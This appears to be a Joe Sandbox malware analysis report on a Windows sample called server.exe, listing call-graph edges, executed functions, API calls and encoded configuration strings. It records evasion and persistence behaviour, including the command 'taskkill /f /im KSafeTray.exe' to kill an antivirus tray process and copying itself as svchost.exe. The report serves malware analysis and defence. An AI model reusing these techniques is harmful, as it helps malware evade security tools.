20131->20133 20132->20128 20133->20128 20135 404b25 20134->20135 20136 404b1e 20134->20136 20135->19917 20138 404751 20136->20138 20145 4048ea 20138->20145 20141 404794 GetCPInfo 20143 4047a8 20141->20143 20144 4048de 20143->20144 20150 404990 GetCPInfo 20143->20150 20144->20135 20146 40490a 20145->20146 20147 4048fa GetOEMCP 20145->20147 20148 40490f GetACP 20146->20148 20149 404762 20146->20149 20147->20146 20148->20149 20149->20141 20149->20143 20149->20144 20151 4049b3 20150->20151 20157 404a7b 20150->20157 20152 4051ce 6 API calls 20151->20152 20153 404a2f 20152->20153 20154 404f7f 9 API calls 20153->20154 20155 404a53 20154->20155 20156 404f7f 9 API calls 20155->20156 20156->20157 20157->20144 20159 4015f5 20158->20159 20166 401000 20159->20166 20161 4015ff 20162 401622 20161->20162 20185 401480 20161->20185 20162->19954 20167 401010 20166->20167 20168 401018 20166->20168 20167->20161 20169 401031 VirtualAlloc 20168->20169 20170 401029 20168->20170 20171 401068 GetProcessHeap HeapAlloc VirtualAlloc VirtualAlloc 20169->20171 20172 40104e VirtualAlloc 20169->20172 20170->20161 20198 401150 20171->20198 20172->20171 20173 401062 20172->20173 20173->20161 20175 4010db 20203 401360 20175->20203 20177 4010f7 20183 40111d 20177->20183 20214 401220 20177->20214 20178 401520 11 API calls 20180 401127 20178->20180 20180->20161 20182 401132 20182->20161 20183->20178 20183->20182 20186 40149b 20185->20186 20188 4014e8 20185->20188 20186->20188 20241 405330 20186->20241 20189 401520 20188->20189 20190 4015ad 20189->20190 20195 40152d 20189->20195 20190->20162 20191 401584 20192 40159d GetProcessHeap HeapFree 20191->20192 20193 40158f VirtualFree 20191->20193 20192->20190 20193->20192 20194 40157a 20196 4019d0 7 API calls 20194->20196 20195->20191 20195->20194 20197 40156f FreeLibrary 20195->20197 20196->20191 20197->20195 20199 40120f 20198->20199 20200 401179 20198->20200 20199->20175 20200->20199 20201 4011bb VirtualAlloc 20200->20201 20202 40118e VirtualAlloc 20200->20202 20201->20200 20202->20200 20204 401383 IsBadReadPtr 20203->20204 20205 40145e 20203->20205 20204->20205 20206 40139c 20204->20206 20205->20177 20207 401466 20206->20207 20208 4013a7 LoadLibraryA 20206->20208 20207->20177 20209 401456 20208->20209 20212 4013bb 20208->20212 20209->20177 20211 401431 IsBadReadPtr 20211->20207 20211->20212 20212->20206 20212->20209 20212->20211 20213 401416 GetProcAddress 20212->20213 20220 401730 20212->20220 20213->20209 20213->20212 20215 401104 20214->20215 20218 40123f 20214->20218 20215->20182 20215->20183 20219 100027c0 GetInputState GetCurrentThreadId PostThreadMessageA GetMessageA 20215->20219 20216 401262 VirtualFree 20216->20218 20217 4012ae VirtualProtect 20217->20218 20218->20215 20218->20216 20218->20217 20219->20183 20221 40174b 20220->20221 20222 40173d 20220->20222 20224 401760 20221->20224 20225 401752 20221->20225 20223 4032b5 12 API calls 20222->20223 20229 401745 20223->20229 20227 401870 20224->20227 20239 40176e 20224->20239 20226 4019d0 7 API calls 20225->20226 20226->20229 20228 40198b 20227->20228 20238 401879 20227->20238 20228->20229 20230 401999 HeapReAlloc 20228->20230 20229->20212 20230->20228 20230->20229 20231 40182e HeapReAlloc 20231->20239 20232 4017e7 HeapAlloc 20232->20239 20233 401951 HeapReAlloc 20233->20238 20234 401915 HeapAlloc 20234->20238 20235 401f14 5 API calls 20235->20239 20236 4029b7 6 API calls 20236->20238 20237 401beb VirtualFree VirtualFree HeapFree 20237->20239 20238->20229 20238->20233 20238->20234 20238->20236 20240 402972 VirtualFree HeapFree VirtualFree 20238->20240 20239->20229 20239->20231 20239->20232 20239->20235 20239->20237 20240->20238 20242 405348 20241->20242 20243 405383 20241->20243 20242->20186 20243->20242 20244 4053bc 15 API calls 20243->20244 20244->20243 20246 4033c2 GetCurrentProcess TerminateProcess 20245->20246 20247 4033d3 20245->20247 20246->20247 20248 401b10 20247->20248 20249 40343d ExitProcess 20247->20249 20248->19957 20250 100fa534 20252 100fa53b 20250->20252 20253 100fa54e VirtualAlloc 20252->20253 20254 100fa795 20252->20254 20255 100fa58e 20253->20255 20256 100fa8f9 ExitProcess 20253->20256 20257 100fa79f 20254->20257 20258 100fa7a9 20254->20258 20260 100fa599 20255->20260 20258->20256 20261 100fa5a8 20260->20261 20262 100fa60a VirtualFree 20261->20262 20264 100fa632 20262->20264 20271 100fa7b0 20264->20271 20265 100fa676 20266 100fa795 20265->20266 20267 100fa776 VirtualProtect 20265->20267 20270 100fa8f9 ExitProcess 20265->20270 20268 100fa79f 20266->20268 20269 100fa7a9 20266->20269 20267->20266 20267->20267 20268->20254 20269->20270 20270->20254 20272 100fa855 ExitProcess 20271->20272 20274 100fa7be 20271->20274 20272->20265 20274->20272 20275 100fa7d7 20274->20275 20275->20265

                                Executed Functions

                                Function 10001A20 Relevance: 242.1, APIs: 44, Strings: 94, Instructions: 586sleepfilestringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10001A51
                                • wsprintfA.USER32 ref: 10001A8D
                                  • Part of subcall function 100018A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100018DD
                                  • Part of subcall function 100018A0: Process32First.KERNEL32(00000000,00000000), ref: 100018FF
                                  • Part of subcall function 100018A0: GetCurrentProcessId.KERNEL32(00000000,00000000,00000002,00000000), ref: 10001914
                                  • Part of subcall function 100018A0: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 10001930
                                  • Part of subcall function 100018A0: GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 10001950
                                  • Part of subcall function 100018A0: _strcmpi.MSVCRT ref: 100019C8
                                  • Part of subcall function 100018A0: CloseHandle.KERNEL32(00000000), ref: 100019D2
                                  • Part of subcall function 100018A0: Process32Next.KERNEL32(00000000,00000128), ref: 100019E2
                                • CreateFileA.KERNEL32(?,C0000000,00000002,00000000,00000004,00000080,00000000), ref: 10001AB5
                                • CloseHandle.KERNEL32(00000000), ref: 10001ABC
                                • Sleep.KERNEL32(000001F4), ref: 10001ACD
                                • FindFirstFileA.KERNEL32(?,?), ref: 10001ADF
                                • GetCurrentDirectoryA.KERNEL32(00000104,00000000), ref: 10001B20
                                • strstr.MSVCRT ref: 10001B33
                                • Sleep.KERNEL32(0000EA60), ref: 10001B54
                                • GetVersionExA.KERNEL32(?), ref: 10001B69
                                • GetSystemDefaultLCID.KERNEL32 ref: 10001B6F
                                • Sleep.KERNEL32(000493E0), ref: 10001BDB
                                • Sleep.KERNEL32(00124F80), ref: 10001BE9
                                • GetLocalTime.KERNEL32(?), ref: 10001BF3
                                • wsprintfA.USER32 ref: 10001C37
                                • _mkdir.MSVCRT ref: 10001C41
                                • Sleep.KERNEL32(000003E8), ref: 10001C4F
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10001CA9
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 10001CC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileSleep$CloseCreateCurrentDirectoryFirstHandleModuleNameProcessProcess32Systemwsprintf$CopyDefaultFindLocalNextOpenSnapshotTimeToolhelp32Version_mkdir_strcmpistrstr
                                • String ID: %s\%02d%02d%02d$%s\Default$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$2$2$2$5$5$5$5$7$7$8$8$8$AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==$HOST$\bb$\kk$\svchost.exe$\tt$a$c$c$c$c$c$c$d$f$f$h$h$h$h$h$k$m$m$m$o$o$o$o$o$o$open$p$p$p$t$t$t$t$t$t$t$t$x$x$x$x$x$x$x$z
                                • API String ID: 3656591282-2909406114
                                • Opcode ID: 178caa9a6ab39458405fe83c5bd611a03c837565114d2103d52ada2d58824686
                                • Instruction ID: 533d04cf14412c8a4f261862c8818537b5c493b5014bb58e8f027dad95579e4f
                                • Opcode Fuzzy Hash: 178caa9a6ab39458405fe83c5bd611a03c837565114d2103d52ada2d58824686
                                • Instruction Fuzzy Hash: D332803114C3C09AE331C6788859B9FBFD6ABE2704F48495DE2C95B2D2CAF59608C767
                                Function 100022F0 Relevance: 63.4, APIs: 31, Strings: 5, Instructions: 351sleepsynchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 20 100022f0-1000234f call 10069820 call 10009720 * 3 29 10002360-100023af sprintf CreateMutexA GetLastError 20->29 30 10002351-10002353 20->30 32 100023b1-100023b9 CloseHandle ExitProcess 29->32 33 100023bf-10002436 GetCurrentProcessId OpenProcess SetPriorityClass CloseHandle GetProcessWindowStation OpenWindowStationA 29->33 30->29 31 10002355-10002357 30->31 31->29 34 10002359-1000235b 31->34 35 10002438-10002439 SetProcessWindowStation 33->35 36 1000243f-10002475 SetErrorMode call 10003780 call 10009720 33->36 37 100027a3-100027ba 34->37 35->36 42 100024b0-100024b7 36->42 43 10002477-100024ab call 1000c4f0 call 1000c520 call 1000c660 36->43 44 100024bc-100024c2 42->44 43->42 46 10002504-10002509 44->46 47 100024c4-100024c6 44->47 50 100025d6-1000260a call 10009720 call 10001160 call 100011b0 46->50 51 1000250f-10002510 46->51 47->46 49 100024c8 47->49 54 100024ca-100024e3 OpenEventA 49->54 84 10002627-10002646 GetTickCount call 10003940 50->84 85 1000260c-10002612 50->85 56 10002512-10002513 51->56 57 10002585-100025b9 call 10009720 call 10001160 call 100011b0 51->57 59 100024f4-100024fe call 10003db0 CloseHandle 54->59 60 100024e5-100024f0 Sleep 54->60 63 10002515-1000251b 56->63 64 1000252f-10002564 call 10009720 call 10001160 call 100011b0 56->64 57->84 87 100025bb-100025c1 57->87 59->46 60->54 68 100024f2 60->68 65 10002526-1000252d 63->65 66 1000251d-10002523 ??3@YAXPAX@Z 63->66 64->84 94 1000256a-10002570 64->94 65->44 66->65 68->46 95 10002648-1000264d 84->95 96 10002669-100026ce GetTickCount call 10001600 call 1000c450 call 10004060 84->96 89 10002614-1000261a ??3@YAXPAX@Z 85->89 90 1000261d-10002622 85->90 92 100025c3-100025c9 ??3@YAXPAX@Z 87->92 93 100025cc-100025d1 87->93 89->90 90->44 92->93 93->44 97 10002572-10002578 ??3@YAXPAX@Z 94->97 98 1000257b-10002580 94->98 95->90 99 1000264f-10002650 95->99 108 100026d0-100026de call 1000ce20 96->108 97->98 98->44 99->93 101 10002656-10002657 99->101 101->98 103 1000265d-10002664 101->103 103->44 111 100026e0-100026eb Sleep 108->111 112 100026ed-100026fb call 1000ce20 108->112 111->108 111->112 115 10002716 GetTickCount 112->115 116 100026fd-10002711 call 1000c660 112->116 118 10002718-1000274a OpenEventA WaitForSingleObject Sleep 115->118 116->44 120 10002752-100027a2 call 10003db0 CloseHandle call 1000c660 SetErrorMode ReleaseMutex CloseHandle call 10003880 118->120 121 1000274c-1000274e 118->121 120->37 121->118 122 10002750 121->122 122->116
                                APIs
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • sprintf.MSVCRT ref: 10002389
                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 1000239C
                                • GetLastError.KERNEL32 ref: 100023A4
                                • CloseHandle.KERNEL32(00000000), ref: 100023B2
                                • ExitProcess.KERNEL32 ref: 100023B9
                                • GetCurrentProcessId.KERNEL32 ref: 100023BF
                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 100023CC
                                • SetPriorityClass.KERNEL32(00000000,00000080), ref: 100023DA
                                • CloseHandle.KERNEL32(00000000), ref: 100023E1
                                • GetProcessWindowStation.USER32 ref: 1000241D
                                • OpenWindowStationA.USER32(winsta0,00000000,02000000), ref: 1000242E
                                • SetProcessWindowStation.USER32(00000000), ref: 10002439
                                • SetErrorMode.KERNEL32(00000001), ref: 10002441
                                • OpenEventA.KERNEL32(001F0003,00000000,?), ref: 100024D9
                                • Sleep.KERNEL32(0000003C), ref: 100024E7
                                • CloseHandle.KERNEL32(00000000), ref: 100024FE
                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000251E
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 10002573
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 100025C4
                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 10002615
                                • GetTickCount.KERNEL32 ref: 1000262D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??3@Process$CloseHandleOpenResourceStationWindow$Error$??2@ClassCountCreateCurrentEventExitFindLastLoadLockModeMutexPrioritySleepTicksprintf
                                • String ID: AAAAAA$BBBBBB$CCCCCC$KKKKKK$winsta0
                                • API String ID: 2686462936-682215413
                                • Opcode ID: e406c62dd523f7dc9c94be31558856dc13c0563786ec41141663d567de75603a
                                • Instruction ID: d6d9c746deec09ccf39e80aeb4b031731eb3513f19be3073a2d6536fba1e20fc
                                • Opcode Fuzzy Hash: e406c62dd523f7dc9c94be31558856dc13c0563786ec41141663d567de75603a
                                • Instruction Fuzzy Hash: 29C1E4B55083819BF721DF64DC85F9B7799EB85380F00092DFA8993286DB74AD48C7A3
                                Function 100018A0 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 112processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100018DD
                                • Process32First.KERNEL32(00000000,00000000), ref: 100018FF
                                • GetCurrentProcessId.KERNEL32(00000000,00000000,00000002,00000000), ref: 10001914
                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 10001930
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 10001950
                                • _strcmpi.MSVCRT ref: 100019C8
                                • CloseHandle.KERNEL32(00000000), ref: 100019D2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 100019E2
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 10001A01
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleProcessProcess32$CreateCurrentFileFirstModuleNameNextOpenSnapshotToolhelp32_strcmpi
                                • String ID: .$l$o$p$r$r$x$x
                                • API String ID: 3180913536-1602884452
                                • Opcode ID: 0c4918338f6a803b253189e55312482d0137ad13600974e65a6d9a9b90dfe338
                                • Instruction ID: 3eff10a53c0cd3c299c3f0263232e505e9bf148dbb3316f1d2a2e0806b88e0d6
                                • Opcode Fuzzy Hash: 0c4918338f6a803b253189e55312482d0137ad13600974e65a6d9a9b90dfe338
                                • Instruction Fuzzy Hash: 0C41B4311093C19AF311CA28C8057DF7BD5EB96394F04096DF5D4962D1DBB8EA0C87A7
                                Function 100014B0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 115filestringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100014DC
                                • FindFirstFileA.KERNEL32(?,?), ref: 10001546
                                • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000080,00000000), ref: 1000157B
                                • ReadFile.KERNEL32(00000000,?,00000104,?,00000000), ref: 10001598
                                • wsprintfA.USER32 ref: 100015B5
                                • CloseHandle.KERNEL32(00000000), ref: 100015BB
                                • wsprintfA.USER32 ref: 100015CA
                                • lstrlen.KERNEL32(?), ref: 100015D6
                                • wsprintfA.USER32 ref: 100015E2
                                • lstrlen.KERNEL32(?), ref: 100015E8
                                  • Part of subcall function 10001380: wsprintfA.USER32 ref: 100013C0
                                  • Part of subcall function 10001380: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100013EC
                                  • Part of subcall function 10001380: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,-00000006), ref: 10001467
                                  • Part of subcall function 10001380: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,-00000006), ref: 1000148B
                                  • Part of subcall function 10001380: CloseHandle.KERNEL32(00000000,?,?,?,?,-00000006), ref: 10001492
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$wsprintf$Resource$CloseCreateDirectoryFindHandleSystemlstrlen$??2@??3@FirstLoadLockReadWrite
                                • String ID: Default$XXXXXX
                                • API String ID: 725747062-3873574582
                                • Opcode ID: 0e0a1ed6f2c2dd669fb9ea203f7d5d0876e1410452d1336e98ef23fb2d9b3107
                                • Instruction ID: 40cba41667d06f7893b38b0f0d94b15b22b4201403879db7e592d3493172572b
                                • Opcode Fuzzy Hash: 0e0a1ed6f2c2dd669fb9ea203f7d5d0876e1410452d1336e98ef23fb2d9b3107
                                • Instruction Fuzzy Hash: 4C31083120030467E318CB74DC91EEF379AEBC5771F040B2DFA56971C0DEA4AE0982A6
                                Function 00401000 Relevance: 7.6, APIs: 6, Instructions: 145COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7866654836aa60b89e9f9a1f09a6f3a833012675fa39c20709ec962009edebc5
                                • Instruction ID: e16900cb5c4ece056a77d287793db1095366f4d6b5bb26a23405047953fa84d7
                                • Opcode Fuzzy Hash: 7866654836aa60b89e9f9a1f09a6f3a833012675fa39c20709ec962009edebc5
                                • Instruction Fuzzy Hash: 6B41B2B27003056FE714DF68AC81B67B398EB88355F14443AFA06EB691DAB5E81486A4
                                Function 1000D900 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 320registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 129 1000d900-1000d974 RegOpenKeyExA 130 1000d976-1000d99c call 1000dd1f 129->130 131 1000d99d-1000d9a3 129->131 133 1000d9a9 131->133 134 1000daaa-1000dac9 call 1000dd1f 131->134 133->134 137 1000db42-1000db84 RegEnumKeyExA 133->137 138 1000dd02-1000dd1a lstrcat 133->138 139 1000daa3 133->139 140 1000d9c4-1000d9ee RegQueryValueExA 133->140 141 1000dce5-1000dcfc 133->141 142 1000da07-1000da31 RegQueryValueExA 133->142 143 1000daca-1000daf4 RegQueryValueExA 133->143 144 1000dc6a-1000dc76 133->144 145 1000dccb-1000dce3 133->145 146 1000d9b0-1000d9b7 133->146 147 1000db11-1000db37 RegQueryValueExA 133->147 148 1000dc78-1000dc7f 133->148 149 1000dbde-1000dc50 RegEnumValueA 133->149 150 1000dc9e-1000dcc9 wsprintfA 133->150 137->134 153 1000db8a-1000dbd9 wsprintfA 137->153 139->134 140->134 158 1000d9f4-1000da05 call 1000d8d0 140->158 156 1000dcfd-1000dcff wsprintfA 141->156 142->134 159 1000da33-1000da42 142->159 143->134 151 1000daf6-1000db0f wsprintfA 143->151 155 1000dc84-1000dc9c wsprintfA 144->155 145->156 146->134 157 1000d9bd 146->157 147->134 152 1000db3d 147->152 148->155 149->134 154 1000dc56-1000dc5d 149->154 150->138 151->139 152->139 153->137 154->138 162 1000dc63 154->162 155->138 156->138 157->134 157->138 157->140 157->141 157->142 157->143 157->144 157->145 157->147 157->148 157->150 167 1000da85-1000daa1 158->167 163 1000da48-1000da4b 159->163 162->138 162->141 162->144 162->145 162->148 162->150 165 1000da4d-1000da7d strncat * 2 strchr 163->165 166 1000da7f 163->166 165->163 166->167 167->139
                                APIs
                                • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C
                                  • Part of subcall function 1000DD1F: RegCloseKey.ADVAPI32(?,1000DAB6), ref: 1000DD29
                                  • Part of subcall function 1000DD1F: RegCloseKey.ADVAPI32(?), ref: 1000DD32
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$Open
                                • String ID: %-25s %-15s $%-25s %-15s %s $%-25s %-15s 0x%x(%d) $REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$[%s]
                                • API String ID: 2976201327-1612119606
                                • Opcode ID: 18a16f3152cab2c84c8789727149057d95980c577145fc1441e5c8d43feecb8f
                                • Instruction ID: 5f681d0d18a1945acf8fc48913839280a3791203cc6d3613b66fb068a083d58d
                                • Opcode Fuzzy Hash: 18a16f3152cab2c84c8789727149057d95980c577145fc1441e5c8d43feecb8f
                                • Instruction Fuzzy Hash: 13C187B19006589FEB14DF94CC84FEE73B9EB88300F504699F619A3184DBB4AE45CFA5
                                Function 10002AB0 Relevance: 42.1, APIs: 17, Strings: 7, Instructions: 119threadstringsleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,100022F0,00000000,00000000,00000000), ref: 10002ACF
                                • CloseHandle.KERNEL32(00000000), ref: 10002AD8
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • CreateThread.KERNEL32(00000000,00000000,10002820,00000000,00000000,00000000), ref: 10002B17
                                • CloseHandle.KERNEL32(00000000), ref: 10002B1A
                                • Sleep.KERNEL32(000001F4), ref: 10002B21
                                • WinExec.KERNEL32(taskkill /f /im KSafeTray.exe,00000000), ref: 10002B3B
                                • CreateThread.KERNEL32(00000000,00000000,10002930,00000000,00000000,00000000), ref: 10002B50
                                • CloseHandle.KERNEL32(00000000), ref: 10002B53
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002B94
                                • GetWindowsDirectoryA.KERNEL32(?,00000100), ref: 10002BA4
                                • lstrcat.KERNEL32(?,1007A0CC), ref: 10002BBA
                                • lstrcat.KERNEL32(?,00000000), ref: 10002BD6
                                • lstrcat.KERNEL32(?,.exe), ref: 10002BE2
                                • MoveFileA.KERNEL32(?,?), ref: 10002BF1
                                • CreateThread.KERNEL32(00000000,00000000,10001A20,00000000,00000000,00000000), ref: 10002C18
                                • CloseHandle.KERNEL32(00000000), ref: 10002C1B
                                • Sleep.KERNEL32(0002BF20), ref: 10002C22
                                  • Part of subcall function 10012620: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
                                  • Part of subcall function 10012620: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
                                  • Part of subcall function 10012620: Process32First.KERNEL32(00000000,00000000), ref: 10012646
                                  • Part of subcall function 10012620: _strcmpi.MSVCRT ref: 10012658
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
